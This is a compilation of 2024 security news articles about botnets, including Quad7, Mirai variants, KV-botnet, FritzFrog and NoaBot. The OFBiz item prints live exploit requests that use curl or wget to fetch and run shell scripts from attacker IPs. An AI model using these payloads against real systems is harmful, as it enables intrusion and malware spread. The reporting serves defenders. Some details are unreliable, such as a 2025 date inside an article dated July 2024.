BotNet  2024  2023  2022  2021  2020


Quad7 Botnet Expands to Target SOHO Routers and VPN Appliances
13.9.24 
BotNet  The Hacker News
The operators of the mysterious Quad7 botnet are actively evolving by compromising several brands of SOHO routers and VPN appliances by leveraging a combination of both known and unknown security flaws.

Targets include devices from TP-LINK, Zyxel, Asus, Axentra, D-Link, and NETGEAR, according to a new report by French cybersecurity company Sekoia.

"The Quad7 botnet operators appear to be evolving their toolset, introducing a new backdoor and exploring new protocols, with the aim of enhancing stealth and evading the tracking capabilities of their operational relay boxes (ORBs)," researchers Felix Aimé, Pierre-Antoine D., and Charles M. said.

Quad7, also called 7777, was first publicly documented by independent researcher Gi7w0rm in October 2023, highlighting the activity cluster's pattern of ensnaring TP-Link routers and Dahua digital video recorders (DVRs) into a botnet.

The botnet, which gets its name from the fact it opens TCP port 7777 on compromised devices, has been observed brute-forcing Microsoft 3665 and Azure instances.

"The botnet also appears to infect other systems like MVPower, Zyxel NAS, and GitLab, although at a very low volume," VulnCheck's Jacob Baines noted earlier this January. "The botnet doesn't just start a service on port 7777. It also spins up a SOCKS5 server on port 11228."

Subsequent analyses by Sekoia and Team Cymru over the past few months have found that not only the botnet has compromised TP-Link routers in Bulgaria, Russia, the U.S., and Ukraine, but has since also expanded to target ASUS routers that have TCP ports 63256 and 63260 opened.


The latest findings show that the botnet is comprised of three additional clusters -

xlogin (aka 7777 botnet) - A botnet composed of compromised TP-Link routers which have both TCP ports 7777 and 11288 opened
alogin (aka 63256 botnet) - A botnet composed of compromised ASUS routers which have both TCP ports 63256 and 63260 opened
rlogin - A botnet composed of compromised Ruckus Wireless devices which have TCP port 63210 opened
axlogin - A botnet capable of targeting Axentra NAS devices (not detected in the wild as yet)
zylogin - A botnet composed of compromised Zyxel VPN appliances that have TCP port 3256 opened
Sekoia told The Hacker News that the countries with the most number of infections are Bulgaria (1,093), the U.S. (733), and Ukraine (697).

In a further sign of tactical evolution, the threat actors now utilize a new backdoor dubbed UPDTAE that establishes an HTTP-based reverse shell to establish remote control on the infected devices and execute commands sent from a command-and-control (C2) server.

It's currently not clear what the exact purpose of the botnet is or who is behind it, but the company said the activity is likely the work of a Chinese state-sponsored threat actor.

"Regarding the 7777 [botnet], we only saw brute-force attempts against Microsoft 365 accounts," Aimé told the publication. "For the other botnets, we still don't know how they are used."

"However, after exchanges with other researchers and new findings, we are almost certain that the operators are more likely CN state-sponsored rather than simple cybercriminals doing [business email compromise]."

"We are seeing the threat actor attempting to be more stealthy by using new malwares on the compromised edge devices. The main aim behind that move is to prevent tracking of the affiliated botnets."


GeoServer Vulnerability Targeted by Hackers to Deliver Backdoors and Botnet Malware
7.9.24 
BotNet  The Hacker News
A recently disclosed security flaw in OSGeo GeoServer GeoTools has been exploited as part of multiple campaigns to deliver cryptocurrency miners, botnet malware such as Condi and JenX, and a known backdoor called SideWalk.

The security vulnerability is a critical remote code execution bug (CVE-2024-36401, CVSS score: 9.8) that could allow malicious actors to take over susceptible instances.

In mid-July, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added it to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The Shadowserver Foundation said it detected exploitation attempts against its honeypot sensors starting July 9, 2024.

According to Fortinet FortiGuard Labs, the flaw has been observed to deliver GOREVERSE, a reverse proxy server designed to establish a connection with a command-and-control (C2) server for post-exploitation activity.

These attacks are said to target IT service providers in India, technology companies in the U.S., government entities in Belgium, and telecommunications companies in Thailand and Brazil.

The GeoServer server has also served as a conduit for Condi and a Mirai botnet variant dubbed JenX, and at least four types of cryptocurrency miners, one of which is retrieved from a fake website that impersonates the Institute of Chartered Accountants of India (ICAI).

Perhaps the most notable of the attack chains leveraging the flaw is the one that propagates an advanced Linux backdoor called SideWalk, which is attributed to a Chinese threat actor tracked as APT41.

The starting point is a shell script that's responsible for downloading the ELF binaries for ARM, MIPS, and X86 architectures, which, in turn, extracts the C2 server from an encrypted configuration, connects to it, and receives further commands for execution on the compromised device.

This includes running a legitimate tool known as Fast Reverse Proxy (FRP) to evade detection by creating an encrypted tunnel from the host to the attacker-controlled server, allowing for persistent remote access, data exfiltration, and payload deployment.

"The primary targets appear to be distributed across three main regions: South America, Europe, and Asia," security researchers Cara Lin and Vincent Li said.

"This geographical spread suggests a sophisticated and far-reaching attack campaign, potentially exploiting vulnerabilities common to these diverse markets or targeting specific industries prevalent in these areas."

The development comes as CISA this week added to its KEV catalog two flaws found in 2021 in DrayTek VigorConnect (CVE-2021-20123 and CVE-2021-20124, CVSS scores: 7.5) that could be exploited to download arbitrary files from the underlying operating system with root privileges.


Unpatched AVTECH IP Camera Flaw Exploited by Hackers for Botnet Attacks
29.8.24 
BotNet  The Hacker News
A years-old high-severity flaw impacting AVTECH IP cameras has been weaponized by malicious actors as a zero-day to rope them into a botnet.

CVE-2024-7029 (CVSS score: 8.7), the vulnerability in question, is a "command injection vulnerability found in the brightness function of AVTECH closed-circuit television (CCTV) cameras that allows for remote code execution (RCE)," Akamai researchers Kyle Lefton, Larry Cashdollar, and Aline Eliovich said.

Details of the security shortcoming were first made public earlier this month by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), highlighting its low attack complexity and the ability to exploit it remotely.

"Successful exploitation of this vulnerability could allow an attacker to inject and execute commands as the owner of the running process," the agency noted in an alert published August 1, 2024.

It's worth noting that the issue remains unpatched. It impacts AVM1203 camera devices using firmware versions up to and including FullImg-1023-1007-1011-1009. The devices, although discontinued, are still used in commercial facilities, financial services, healthcare and public health, transportation systems sectors, per CISA.

Akamai said the attack campaign has been underway since March 2024, although the vulnerability has had a public proof-of-concept (PoC) exploit as far back as February 2019. However, a CVE identifier wasn't issued until this month.

"Malicious actors who operate these botnets have been using new or under-the-radar vulnerabilities to proliferate malware," the web infrastructure company said. "There are many vulnerabilities with public exploits or available PoCs that lack formal CVE assignment, and, in some cases, the devices remain unpatched."

The attack chains are fairly straightforward in that they leverage the AVTECH IP camera, alongside other known vulnerabilities (CVE-2014-8361 and CVE-2017-17215), to spread a Mirai botnet variant on target systems.

"In this instance, the botnet is likely using the Corona Mirai variant, which has been referenced by other vendors as early as 2020 in relation to the COVID-19 virus," the researchers said. "Upon execution, the malware connects to a large number of hosts through Telnet on ports 23, 2323, and 37215. It also prints the string 'Corona' to the console on an infected host."

The development comes weeks after cybersecurity firms Sekoia and Team Cymru detailed a "mysterious" botnet named 7777 (or Quad7) that has leveraged compromised TP-Link and ASUS routers to stage password-spraying attacks against Microsoft 365 accounts. As many as 12,783 active bots have been identified as of August 5, 2024.

"This botnet is known in open source for deploying SOCKS5 proxies on compromised devices to relay extremely slow 'brute-force' attacks against Microsoft 365 accounts of many entities around the world," Sekoia researchers said, noting that a majority of the infected routers are located in Bulgaria, Russia, the U.S., and Ukraine.

While the botnet gets its name from the fact it opens TCP port 7777 on compromised devices, a follow-up investigation from Team Cymru has since revealed a possible expansion to include a second set of bots that are composed mainly of ASUS routers and characterized by the open port 63256.

"The Quad7 botnet continues to pose a significant threat, demonstrating both resilience and adaptability, even if its potential is currently unknown or unreached," Team Cymru said. "The linkage between the 7777 and 63256 botnets, while maintaining what appears to be a distinct operational silo, further underscores the evolving tactics of the threat operators behind Quad7."


New Gafgyt Botnet Variant Targets Weak SSH Passwords for GPU Crypto Mining
15.8.24 
BotNet  The Hacker News
Cybersecurity researchers have discovered a new variant of the Gafgyt botnet that's targeting machines with weak SSH passwords to ultimately mine cryptocurrency on compromised instances using their GPU computational power.

This indicates that the "IoT botnet is targeting more robust servers running on cloud native environments," Aqua Security researcher Assaf Morag said in a Wednesday analysis.

Gafgyt (aka BASHLITE, Lizkebab, and Torlus), known to be active in the wild since 2014, has a history of exploiting weak or default credentials to gain control of devices such as routers, cameras, and digital video recorders (DVRs). It's also capable of leveraging known security flaws in Dasan, Huawei, Realtek, SonicWall, and Zyxel devices.

The infected devices are corralled into a botnet capable of launching distributed denial-of-service (DDoS) attacks against targets of interest. There is evidence to suggest that Gafgyt and Necro are operated by a threat group called Keksec, which is also tracked as Kek Security and FreakOut.

IoT Botnets like Gafgyt are constantly evolving to add new features, with variants detected in 2021 using the TOR network to cloak the malicious activity, as well as borrow some modules from the leaked Mirai source code. It's worth noting that Gafgyt's source code was leaked online in early 2015, further fueling the emergence of new versions and adaptations.


The latest attack chains involve brute-forcing SSH servers with weak passwords to deploy next-stage payloads to facilitate a cryptocurrency mining attack using "systemd-net," but not before terminating competing malware already running on the compromised host.

It also executes a worming module, a Go-based SSH scanner named ld-musl-x86, that's responsible for scanning the internet for poorly secured servers and propagating the malware to other systems, effectively expanding the scale of the botnet. This comprises SSH, Telnet, and credentials related to game servers and cloud environments like AWS, Azure, and Hadoop.

"The cryptominer in use is XMRig, a Monero cryptocurrency miner," Morag said. "However, in this case, the threat actor is seeking to run a cryptominer using the --opencl and --cuda flags, which leverage GPU and Nvidia GPU computational power."

"This, combined with the fact that the threat actor's primary impact is crypto-mining rather than DDoS attacks, supports our claim that this variant differs from previous ones. It is aimed at targeting cloud-native environments with strong CPU and GPU capabilities."

Data gathered by querying Shodan shows that there are over 30 million publicly accessible SSH servers, making it essential that users take steps to secure the instances against brute-force attacks and potential exploitation.


Mirai Botnet targeting OFBiz Servers Vulnerable to Directory Traversal
2.8.24 
BotNet  The Hacker News
Enterprise Resource Planning (ERP) Software is at the heart of many enterprising supporting human resources, accounting, shipping, and manufacturing. These systems can become very complex and difficult to maintain. They are often highly customized, which can make patching difficult. However, critical vulnerabilities keep affecting these systems and put critical business data at risk.

The SANS Internet Storm Center published a report showing how the open-source ERP framework OFBiz is currently the target of new varieties of the Mirai botnet.

As part of its extensive project portfolio, the Apache Foundation supports OFBiz, a Java-based framework for creating ERP (Enterprise Resource Planning) applications. OFBiz appears to be far less prevalent than commercial alternatives. However, just as with any other ERP system, organizations rely on it for sensitive business data, and the security of these ERP systems is critical.

In May this year, a critical security update was released for OFBiz. The update fixed a directory traversal vulnerability that could lead to remote command execution. OFBiz versions before 18.12.13 were affected. A few weeks later, details about the vulnerability were made public.

Directory traversal, or path traversal, vulnerabilities can be used to bypass access control rules. For example, if a user can access a "/public" directory but not a "/admin" directory, an attacker may use a URL like "/public/../admin" to fool the access control logic. Recently, CISA and FBI released an alert as part of the "Secure by Design" initiative, focusing on directory traversal. CISA pointed out that they are currently tracking 55 directory traversal vulnerabilities as part of the "Known Exploited Vulnerabilities" (KEV) catalog.

For OFBiz, the directory traversal is easily triggered by inserting a semicolon. All an attacker has to find is a URL they can access and append a semicolon followed by a restricted URL. The exploit URL we currently see is:

/webtools/control/forgotPassword;/ProgramExport
Because users must be able to reset passwords without first logging in, "forgotPassword" does not require any authentication. "ProgramExport," on the other hand, should be access-controlled and not reachable unless the user is logged in. "ProgramExport" is particularly dangerous in that it allows arbitrary code execution. Faulty logic in OFBiz stopped evaluating the URL at the semicolon. This allowed any user, without logging in, to access the second part of the URL, "/ProgramExport."

An attacker must use a POST request to exploit the vulnerability but does not necessarily need a request body. Instead, a URL parameter will work just fine.

The SANS Internet Storm Center uses an extensive network of honeypots to detect attempts to exploit a wide range of web application vulnerabilities. Significant new exploit attempts are summarized in a "First Seen" report. This weekend, these sensors detected a significant increase in attempts to exploit CVE-2024-32213, the OFBiz mentioned above directory traversal vulnerability, which was immediately picked up by the "First Seen" report.

The exploit attempts originated from two different IP addresses that were also associated with various attempts to exploit IoT devices, commonly associated with current varieties of the "Mirai" botnet.

The miscreants used two flavors of the exploit. The first one used the URL to include the command the exploit was intended to execute:

POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https://95.214.27.196/where/bin.sh
The second one used the body of the request for the command, which is more common for "POST" requests:

POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host: [victim IP address]
Accept: */*
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
groovyProgram=throw+new+Exception('curl https://185.196.10.231/sh | sh -s ofbiz || wget -O- https://185.196.10.231/sh | sh -s ofbiz'.execute().text);
Sadly, neither the "bin.sh" nor "sh" script was not recovered. The IP addresses were involved in scans on July 29th, using the user agent "KrebsOnSecurity," a tip fo the hat to infosec blogger Brian Krebs. However, the URLs scanned were mostly parasitic, looking for existing web shells left behind by prior attacks. The IP address was also used to distribute a file called "botx.arm". This filename is often associated with Mirai variants.

With the vulnerability announcement in May, we have been waiting for some scans to take advantage of the OFBiz vulnerability. Exploitation was trivial, and while the vulnerable and exposed population is small, this hasn't stopped attackers in the past. But they are now at least experimenting and maybe adding the vulnerability to bots like Mirai variants.

There are only a few IPs involved:

95.214.27.196: Sending exploit as URL parameter and hosting malware.
83.222.191.62: Sending exploit as request body. Malware hosted on 185.196.10.231. Earlier in July, this IP scanned for IoT vulnerabilities.
185.196.10.231: hosting malware
If you found this article interesting and would like to delve more into the world of Securing Web Applications, APIs, and Microservices, you can join me at Network Security 2024 (September 4-9) for my course, SEC522. See all that's in-store at the event here.


New Golang-Based Zergeca Botnet Capable of Powerful DDoS Attacks
5.7.24 
BotNet  The Hacker News
Cybersecurity researchers have uncovered a new botnet called Zergeca that's capable of conducting distributed denial-of-service (DDoS) attacks.

Written in Golang, the botnet is so named for its reference to a string named "ootheca" present in the command-and-control (C2) servers ("ootheca[.]pw" and "ootheca[.]top").

"Functionally, Zergeca is not just a typical DDoS botnet; besides supporting six different attack methods, it also has capabilities for proxying, scanning, self-upgrading, persistence, file transfer, reverse shell, and collecting sensitive device information," the QiAnXin XLab team said in a report. Zergeca is also notable for using DNS-over-HTTPS (DoH) to perform Domain Name System (DNS) resolution of the C2 server and using a lesser-known library known as Smux for C2 communications.

There is evidence to suggest that the malware is actively developing and updating the malware to support new commands. What's more, the C2 IP address 84.54.51[.]82 is said to have been previously used to distribute the Mirai botnet around September 2023.

As of April 29, 2025, the same IP address began to be used as a C2 server for the new botnet, raising the possibility that the threat actors "accumulated experience operating the Mirai botnets before creating Zergeca."

Attacks mounted by the botnet, primarily ACK flood DDoS attacks, have targeted Canada, Germany, and the U.S. between early and mid-June 2024.

Zergeca's features span four distinct modules – namely persistence, proxy, silivaccine, and zombie – to set up persistence by adding a system service, implementing proxying, removing competing miner and backdoor malware, and gaining exclusive control over devices running the x86-64 CPU architecture, and handle the main botnet functionality.
The zombie module is responsible for reporting sensitive information from the compromised device to the C2 and awaits commands from the server, supporting six types of DDoS attacks, scanning, reverse shell, and other functions.

"The built-in competitor list shows familiarity with common Linux threats," XLab said. "Techniques like modified UPX packing, XOR encryption for sensitive strings, and using DoH to hide C2 resolution demonstrate a strong understanding of evasion tactics."


10-Year-Old 'RUBYCARP' Romanian Hacker Group Surfaces with Botnet
9.4.24  BotNet  The Hacker News

A threat group of suspected Romanian origin called RUBYCARP has been observed maintaining a long-running botnet for carrying out crypto mining, distributed denial-of-service (DDoS), and phishing attacks.

The group, believed to be active for at least 10 years, employs the botnet for financial gain, Sysdig said in a report shared with The Hacker News.

"Its primary method of operation leverages a botnet deployed using a variety of public exploits and brute-force attacks," the cloud security firm said. "This group communicates via public and private IRC networks."

Evidence gathered so far suggests that RUBYCARP may have crossover with another threat cluster tracked by Albanian cybersecurity firm Alphatechs under the moniker Outlaw, which has a history of conducting crypto mining and brute-force attacks and has since pivoted to phishing and spear-phishing campaigns to cast a wide net.

"These phishing emails often lure victims into revealing sensitive information, such as login credentials or financial details," security researcher Brenton Isufi said in a report published in late December 2023.

A notable aspect of RUBYCARP's tradecraft is the use of a malware called ShellBot (aka PerlBot) to breach target environments. It has also been observed exploiting security flaws in the Laravel Framework (e.g., CVE-2021-3129), a technique also adopted by other threat actors like AndroxGh0st.


In a sign that the attackers are expanding their arsenal of initial access methods to expand the scale of the botnet, Sysdig said it discovered signs of WordPress sites being compromised using commonly used usernames and passwords.

"Once access is obtained, a backdoor is installed based on the popular Perl ShellBot," the company said. "The victim's server is then connected to an [Internet Relay Chat] server acting as command-and-control, and joins the larger botnet."

The botnet is estimated to comprise over 600 hosts, with the IRC server ("chat.juicessh[.]pro") created on May 1, 2023. It heavily relies on IRC for general communications as well as for managing its botnets and coordinating crypto mining campaigns.

Furthermore, members of the group – named juice_, Eugen, Catalin, MUIE, and Smecher, among others – have been found to communicate via an Undernet IRC channel called #cristi. Also put to use is a mass scanner tool to find new potential hosts.

RUBYCARP's arrival on the cyber threat scene is not surprising given their ability to take advantage of the botnet to fuel diverse illicit income streams such as crypto mining and phishing operations to steal credit card numbers.

While it appears that the stolen credit card data is used to purchase attack infrastructure, there is also the possibility that the information could be monetized through other means by selling it in the cyber crime underground.

"These threat actors are also involved in the development and sale of cyber weapons, which isn't very common," Sysdig said. "They have a large arsenal of tools they have built up over the years, which gives them quite a range of flexibility when conducting their operations.


TheMoon Botnet Resurfaces, Exploiting EoL Devices to Power Criminal Proxy
30.3.24  BotNet  The Hacker News
A botnet previously considered to be rendered inert has been observed enslaving end-of-life (EoL) small home/small office (SOHO) routers and IoT devices to fuel a criminal proxy service called Faceless.

"TheMoon, which emerged in 2014, has been operating quietly while growing to over 40,000 bots from 88 countries in January and February of 2024," the Black Lotus Labs team at Lumen Technologies said.

Faceless, detailed by security journalist Brian Krebs in April 2023, is a malicious residential proxy service that's offered its anonymity services to other threat actors for a negligible fee that costs less than a dollar per day.

In doing so, it allows the customers to route their malicious traffic through tens of thousands of compromised systems advertised on the service, effectively concealing their true origins.

The Faceless-backed infrastructure has been assessed to be used by operators of malware such as SolarMarker and IcedID to connect to their command-and-control (C2) servers to obfuscate their IP addresses.

That being said, a majority of the bots are used for password spraying and/or data exfiltration, primarily targeting the financial sector, with more than 80% of the infected hosts located in the U.S.

Lumen said it first observed the malicious activity in late 2023, the goal being to breach EoL SOHO routers and IoT devices and deploy an updated version of TheMoon, and ultimately enroll the botnet into Faceless.


The attacks entail dropping a loader that's responsible for fetching an ELF executable from a C2 server. This includes a worm module that spreads itself to other vulnerable servers and another file called ".sox" that's used to proxy traffic from the bot to the internet on behalf of a user.

In addition, the malware configures iptables rules to drop incoming TCP traffic on ports 8080 and 80 and allow traffic from three different IP ranges. It also attempts to contact an NTP server from a list of legitimate NTP servers in a likely effort to determine if the infected device has internet connectivity and it is not being run in a sandbox.

The targeting of EoL appliances to fabricate the botnet is no coincidence, as they are no longer supported by the manufacturer and become susceptible to security vulnerabilities over time. It's also possible that the devices are infiltrated by means of brute-force attacks.

Additional analysis of the proxy network has revealed that more than 30% of the infections lasted for over 50 days, while about 15% of the devices were part of the network for 48 hours or less.

"Faceless has become a formidable proxy service that rose from the ashes of the 'iSocks' anonymity service and has become an integral tool for cyber criminals in obfuscating their activity," the company said. "TheMoon is the primary, if not the only, supplier of bots to the Faceless proxy service."


After FBI Takedown, KV-Botnet Operators Shift Tactics in Attempt to Bounce Back
8.2.24  BotNet  The Hacker News
The threat actors behind the KV-botnet made "behavioral changes" to the malicious network as U.S. law enforcement began issuing commands to neutralize the activity.

KV-botnet is the name given to a network of compromised small office and home office (SOHO) routers and firewall devices across the world, with one specific cluster acting as a covert data transfer system for other Chinese state-sponsored actors, including Volt Typhoon (aka Bronze Silhouette, Insidious Taurus, or Vanguard Panda).

Active since at least February 2022, it was first documented by the Black Lotus Labs team at Lumen Technologies in mid-December 2023. The botnet is known to comprise two main sub-groups, viz. KV and JDY, with the latter principally used for scanning potential targets for reconnaissance.

Late last month, the U.S. government announced a court-authorized disruption effort to take down the KV cluster, which is typically reserved for manual operations against high-profile targets chosen after broader scanning via the JDY sub-group.

Now, according to new findings from the cybersecurity firm, the JDY cluster fell silent for roughly fifteen days following public disclosure and as a byproduct of the U.S. Federal Bureau of Investigation (FBI) undertaking.

"In mid-December 2023, we observed this activity cluster hovering around 1,500 active bots," security researcher Ryan English said. "When we sampled the size of this cluster in mid-January 2024 its size dwindled to approximately 650 bots."

Given that the takedown actions began with a signed warrant issued on December 6, 2023, it's fair to assume that the FBI began transmitting commands to routers located in the U.S. sometime on or after that date to wipe the botnet payload and prevent them from being re-infected.

"We observed the KV-botnet operators begin to restructure, committing eight straight hours of activity on December 8, 2023, nearly ten hours of operations the following day on December 9, 2023, followed by one hour on December 11, 2023," Lumen said in a technical report shared with The Hacker News.

During this four-day period, the threat actor was spotted interacting with 3,045 unique IP addresses that were associated with NETGEAR ProSAFEs (2,158), Cisco RV320/325 (310), Axis IP cameras (29), DrayTek Vigor routers (17), and other unidentified devices (531).

Also observed in early December 2023 was a massive spike in exploitation attempts from the payload server, indicating the adversary's likely attempts to re-exploit the devices as they detected their infrastructure going offline. Lumen said it also took steps to null-route another set of backup servers that became operational around the same time.

It's worth noting that the operators of the KV-botnet are known to perform their own reconnaissance and targeting while also supporting multiple groups like Volt Typhoon. Interestingly, the timestamps associated with exploitation of the bots correlates to China working hours.

"Our telemetry indicates that there were administrative connections into the known payload servers from IP addresses associated with China Telecom," Danny Adamitis, principal information security engineer at Black Lotus Labs, told The Hacker News.


What's more, the press statement from the U.S. Justice Department described the botnet as controlled by "People's Republic of China (PRC) state-sponsored hackers."

This raises the possibility that the botnet "was created by an organization supporting the Volt Typhoon hackers; whereas if the botnet was created by Volt Typhoon, we suspect they would have said 'nation-state' actors," Adamitis added.

There are also signs that the threat actors established a third related-but-distinct botnet cluster dubbed x.sh as early as January 2023 that's composed of infected Cisco routers by deploying a web shell named "fys.sh," as highlighted by SecurityScorecard last month.

But with KV-botnet being just "one form of infrastructure used by Volt Typhoon to obfuscate their activity," it's expected that the recent wave of actions will prompt the advanced persistent threat (APT) actors to presumably transition to another covert network in order to meet their strategic goals.

"A significant percent of all networking equipment in use around the world is functioning perfectly well, but is no longer supported," English said. "End users have a difficult financial choice when a device reaches that point, and many aren't even aware that a router or firewall is at the end of its supported life.

"Advanced threat actors are well aware that this represents fertile ground for exploitation. Replacing unsupported devices is always the best choice, but not always feasible."

"Mitigation involves defenders adding their edge devices to the long list of those they already have to patch and update as often as available, rebooting devices and configuring EDR or SASE solutions where applicable, and keeping an eye on large data transfers out of the network. Geofencing is not a defense to rely on, when the threat actor can hop from a nearby point."


FritzFrog Returns with Log4Shell and PwnKit, Spreading Malware Inside Your Network
2.2.24  BotNet  The Hacker News
The threat actor behind a peer-to-peer (P2P) botnet known as FritzFrog has made a return with a new variant that leverages the Log4Shell vulnerability to propagate internally within an already compromised network.

"The vulnerability is exploited in a brute-force manner that attempts to target as many vulnerable Java applications as possible," web infrastructure and security company Akamai said in a report shared with The Hacker News.

FritzFrog, first documented by Guardicore (now part of Akamai) in August 2020, is a Golang-based malware that primarily targets internet-facing servers with weak SSH credentials. It's known to be active since January 2020.

It has since evolved to strike healthcare, education, and government sectors as well as improved its capabilities to ultimately deploy cryptocurrency miners on infected hosts.

What's novel about the latest version is the use of the Log4Shell vulnerability as a secondary infection vector to specifically single out internal hosts rather than targeting vulnerable publicly-accessible assets.

"When the vulnerability was first discovered, internet-facing applications were prioritized for patching because of their significant risk of compromise," security researcher Ori David said.

"Contrastly, internal machines, which were less likely to be exploited, were often neglected and remained unpatched — a circumstance that FritzFrog takes advantage of."


This means that even if the internet-facing applications have been patched, a breach of any other endpoint can expose unpatched internal systems to exploitation and propagate the malware.

The SSH brute-force component of FritzFrog has also received a facelift of its own to identify specific SSH targets by enumerating several system logs on each of its victims.

Another notable change in the malware is use of the PwnKit flaw tracked as CVE-2021-4034 to achieve local privilege escalation.

"FritzFrog continues to employ tactics to remain hidden and avoid detection," David said. "In particular, it takes special care to avoid dropping files to disk when possible."

This is accomplished by means of the shared memory location /dev/shm, which has also been put to use by other Linux-based malware such as BPFDoor and Commando Cat, and memfd_create to execute memory-resident payloads.

The disclosure comes as Akamai revealed that the InfectedSlurs botnet is actively exploiting now-patched security flaws (from CVE-2024-22768 through CVE-2024-22772, and CVE-2024-23842) impacting multiple DVR device models from Hitron Systems to launch distributed denial-of-service (DDoS) attacks.


U.S. Feds Shut Down China-Linked "KV-Botnet" Targeting SOHO Routers
2.2.24  BotNet  The Hacker News
The U.S. government on Wednesday said it took steps to neutralize a botnet comprising hundreds of U.S.-based small office and home office (SOHO) routers hijacked by a China-linked state-sponsored threat actor called Volt Typhoon and blunt the impact posed by the hacking campaign.

The existence of the botnet, dubbed KV-botnet, was first disclosed by the Black Lotus Labs team at Lumen Technologies in mid-December 2023. The law enforcement effort was reported by Reuters earlier this week.

"The vast majority of routers that comprised the KV-botnet were Cisco and NetGear routers that were vulnerable because they had reached 'end of life' status; that is, they were no longer supported through their manufacturer's security patches or other software updates," the Department of Justice (DoJ) said in a press statement.

Volt Typhoon (aka DEV-0391, Bronze Silhouette, Insidious Taurus, or Vanguard Panda) is the moniker assigned to a China-based adversarial collective that has been attributed to cyber attacks targeting critical infrastructure sectors in the U.S. and Guam.

"Chinese cyber actors, including a group known as 'Volt Typhoon,' are burrowing deep into our critical infrastructure to be ready to launch destructive cyber attacks in the event of a major crisis or conflict with the United States," CISA Director Jen Easterly noted.

The cyber espionage group, believed to be active since 2021, is known for its reliance on legitimate tools and living-off-the-land (LotL) techniques to fly under the radar and persist within victim environments for extended periods of time to gather sensitive information.

Another important aspect of its modus operandi is that it tries to blend into normal network activity by routing traffic through compromised SOHO network equipment, including routers, firewalls, and VPN hardware, in an attempt to obfuscate their origins.

This is accomplished by means of the KV-botnet, which commandeers devices from Cisco, DrayTek, Fortinet, and NETGEAR for use as a covert data transfer network for advanced persistent threat actors. It's suspected that the botnet operators offer their services to other hacking outfits, including Volt Typhoon.

In January 2024, a report from cybersecurity firm SecurityScorecard revealed how the botnet has been responsible for compromising as much as 30% — or 325 of 1,116 — of end-of-life Cisco RV320/325 routers over a 37-day period from December 1, 2023, to January 7, 2024.

"Volt Typhoon is at least one user of the KV-botnet and [...] this botnet encompasses a subset of their operational infrastructure," Lumen Black Lotus Labs said, adding the botnet "has been active since at least February 2022."

The botnet is also designed to download a virtual private network (VPN) module to the vulnerable routers and set up a direct encrypted communication channel to control the botnet and use it as an intermediary relay node to achieve their operational goals.

"One function of the KV-botnet is to transmit encrypted traffic between the infected SOHO routers, allowing the hackers to anonymize their activities (i.e., the hackers appear to be operating from the SOHO routers, versus their actual computers in China)," according to affidavits filed by the U.S. Federal Bureau of Investigation (FBI).

As part of its efforts to disrupt the botnet, the agency said it remotely issued commands to target routers in the U.S. using the malware's communication protocols to delete the KV-botnet payload and prevent them from being re-infected. The FBI said it also notified every victim about the operation, either directly or via their internet service provider if contact information was not available.

"The court-authorized operation deleted the KV-botnet malware from the routers and took additional steps to sever their connection to the botnet, such as blocking communications with other devices used to control the botnet," the DoJ added.

It's important to point out here that the unspecified prevention measures employed to remove the routers from the botnet are temporary and cannot survive a reboot. In other words, simply restarting the devices would render them susceptible to re-infection.

"The Volt Typhoon malware enabled China to hide, among other things, pre-operational reconnaissance and network exploitation against critical infrastructure like our communications, energy, transportation, and water sectors – steps China was taking, in other words, to find and prepare to destroy or degrade the civilian critical infrastructure that keeps us safe and prosperous," FBI Director Christopher Wray said.

However, the Chinese government, in a statement shared with Reuters, denied any involvement in the attacks, dismissing it as a "disinformation campaign" and that it "has been categorical in opposing hacking attacks and the abuse of information technology."

Coinciding with the takedown, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) published new guidance urging SOHO device manufacturers to embrace a secure by design approach during development and shift the burden away from customers.

Specifically, it's recommending that manufacturers eliminate exploitable defects in SOHO router web management interfaces and modify default device configurations to support automatic update capabilities and require a manual override to remove security settings.

The compromise of edge devices such as routers for use in advanced persistent attacks mounted by Russia and China highlights a growing problem that's compounded by the fact that legacy devices no longer receive security patches and do not support endpoint detection and response (EDR) solutions.

"The creation of products that lack appropriate security controls is unacceptable given the current threat environment," CISA said. "This case exemplifies how a lack of secure by design practices can lead to real-world harm both to customers and, in this case, our nation's critical infrastructure."


NoaBot: Latest Mirai-Based Botnet Targeting SSH Servers for Crypto Mining
11.1.24  BotNet  The Hacker News
A new Mirai-based botnet called NoaBot is being used by threat actors as part of a crypto mining campaign since the beginning of 2023.

"The capabilities of the new botnet, NoaBot, include a wormable self-spreader and an SSH key backdoor to download and execute additional binaries or spread itself to new victims," Akamai security researcher Stiv Kupchik said in a report shared with The Hacker News.

Mirai, which had its source code leaked in 2016, has been the progenitor of a number of botnets, the most recent being InfectedSlurs, which is capable of mounting distributed denial-of-service (DDoS) attacks.

There are indications that NoaBot could be linked to another botnet campaign involving a Rust-based malware family known as P2PInfect, which recently received an update to target routers and IoT devices.

This is based on the fact that threat actors have also experimented with dropping P2PInfect in place of NoaBot in recent attacks targeting SSH servers, indicating likely attempts to pivot to custom malware.

Despite NaoBot's Mirai foundations, its spreader module leverages an SSH scanner to search for servers susceptible to dictionary attack in order to brute-force them and add an SSH public key in the .ssh/authorized_keys file for remote access. Optionally, it can also download and execute additional binaries post successful exploitation or propagate itself to new victims.


"NoaBot is compiled with uClibc, which seems to change how antivirus engines detect the malware," Kupchik noted. "While other Mirai variants are usually detected with a Mirai signature, NoaBot's antivirus signatures are of an SSH scanner or a generic trojan."

Besides incorporating obfuscation tactics to render analysis challenging, the attack chain ultimately results in the deployment of a modified version of the XMRig coin miner.

What makes the new variant a cut above other similar Mirai botnet-based campaigns is that it does not contain any information about the mining pool or the wallet address, thereby making it impossible to assess the profitability of the illicit cryptocurrency mining scheme.

"The miner obfuscates its configuration and also uses a custom mining pool to avoid exposing the wallet address used by the miner," Kupchik said, highlighting some level of preparedness of the threat actors.

Akamai said it identified 849 victim IP addresses to date that are spread geographically across the world, with high concentrations reported in China, so much so that it amounts to almost 10% of all attacks against its honeypots in 2023.

